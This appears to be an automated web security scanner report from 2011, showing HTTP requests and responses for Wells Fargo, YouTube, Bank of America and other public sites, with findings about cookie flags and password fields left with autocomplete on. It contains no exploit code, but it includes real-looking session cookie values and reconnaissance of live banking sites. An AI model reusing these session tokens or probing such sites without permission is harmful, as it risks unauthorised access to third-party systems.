HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT Content-length: 4031 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=DlmtNJhHwTpCxFhl7FBT67mHHMKLxbDC2y70fqHsr9QSGL2dNp8S!-569549476; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2650037002.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /savings_cds/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-length: 10180 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=9yssNJhQcHYRQwphr7KvYjH4Szhz7CLfb0yjsLmN4nqrqJT2KflR!-1077237731; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2415155978.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /savings_cds/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11173 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=QXvBNJhRBz1LhBrHvvFfBbPQG6rFyxf2hyty12cJL1qHvL1yCGRS!1697366244; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2096388874.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Open a Savings Account or CD</ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /savings_cds/cds HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:37 GMT Content-length: 11464 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3TjSNJhR0CvRKG9J9LJwhrzLL0G7hxT2GGYTmjjJN1n923x9J3gv!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>CD Account - Find the Best CD ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/search HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:02 GMT Content-type: text/html; charset=utf-8 Cache-Control: no-cache="Set-Cookie" Set-Cookie: wcmcookiesrh=1TB6NJhKK2Z9GypBRB8QHHz19dkkKbNngWBYv9m0hsNTRY1JpPYr!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sitemap HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-length: 11525 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Sitemap</title> <meta name=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /student/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Content-length: 11102 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /student/loans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:45 GMT Location: https://www.wellsfargo.com/student/apply Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/student ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /theprivatebank/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 10631 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/autoloans/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:12 GMT Content-length: 4590 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:13 GMT Content-length: 5083 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 4878 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wf/product/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT X-Cnection: close Location: https://www.wellsfargo.com:443/customerApp/product/apply Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure Content-Language: en Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com:443/cus ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wfonline/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 10682 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wfonline/bill_pay/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:32 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Online - Bill Pay< ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 See Other Date: Thu, 03 Feb 2011 01:17:43 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: VISITOR_INFO1_LIVE=XJ-WTjH7UMA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:43 GMT Set-Cookie: GEO=61c81e28805bccac540fef7fe21d6dafcwsAAAAzVVOtwdbzTUoCNw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=tPkJgKGgiVxR6VkyDxY0jMxu78qvhsjgoVr5s_OceJDQL_gh8WA3DK0wRe7SuQUcEQAF3en5aCBxUZe2i0H_Uofu5XRfNzNbj2jrlPvXTLDTPY8C_VQ_zsdHASZNpsQr-KXA7tSvZWfgU_4a1hlfLTkjpIknV7Cl1-2DLxGPithWt5ElD7hFmCXFR8gZVhBZOSKLuqeNRgqcMWiQeKdObub0ZNOc-1n1VomUbzwuBxm29IkoaDB3UA_wKtjbqiJ_amyjAQEZhbJaIA8HZAcU4ENpdzK6ncp3ZJ01PYBydW7KX5cIkc2Zvw Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /promos/jump/greatdeals/ HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:12 GMT Content-type: magnus-internal/cold-fusion Set-Cookie: SMIDENTITY=0UqbHxrdFB+IZK/yIQDzBx9SGv6BGzL7lzH4+m2m5Ag/SL9g3npRFfVI6KIEmu0/Hod7q4EuA6oQzDdS85o0coYHleZFid+LBGvSY5uZLDygIZeae1UW2VBI88kvQSWsFmOlVn5ZEmIo2pN8snUAFivEWp9gsATazmwhZjY9EzqSNnEBTOjkBSSYcTUyCwY3NSVzGO93DWb469Ts3G/FPGczX6tRnbWL6wLVjkb8afFGuYjisfHuVsWpgdMI5dnkNoJ77iZMPx7Ff3x7H4Um8dmvEOCfQ82H3QQmiLdgmuMYSmX2E4DMfhH+mVL8nqqXb1tWI4F55ChQZPtkyefbEs1rNkirDxvvGe2qQe33bFK1n6kE4VHyP8PFs6toDIGPr26lPotHq/TiTLqEm2Tm6b3uxs/3VLAjG9MoImDw/AfxTngVEJ7x9tafVeZOmteLNMr255a5XDiYVNFUeFQqVHqg8rSJii6JhV2ShUOawB6iMsk690ww5mVHKkPF1lMW; path=/; domain=.bankofamerica.com; secure Location: http://www.bankofamerica.com/promos/jump/greatdeals2/?dbgredir= Connection: close
12. Password field with autocomplete enabledpreviousnext There are 32 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
password
Request
GET /index.php?app=core&module=global§ion=login HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The form contains the following password field with autocomplete enabled:
password
Request
GET /resources/documentation/index.html HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=s&special=&ndb=1%20target= HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:38 GMT Connection: close Content-Length: 85564 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=BLGBFPGBOBOPPDLCDHNLOLLM; path=/ Cache-control: private
The page contains a form with the following action URL:
http://fis.com/fis/worldnews/worldnews.asp
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The form contains the following password field with autocomplete enabled:
password
Request
GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:02:54 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">
The form contains the following password field with autocomplete enabled:
passwd
Request
GET / HTTP/1.1 Host: ipboard-software.software.informer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 01:02:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 17619
The page contains a form with the following action URL:
https://www.change.org/login/login
The form contains the following password field with autocomplete enabled:
user[password]
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field with autocomplete enabled:
password
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
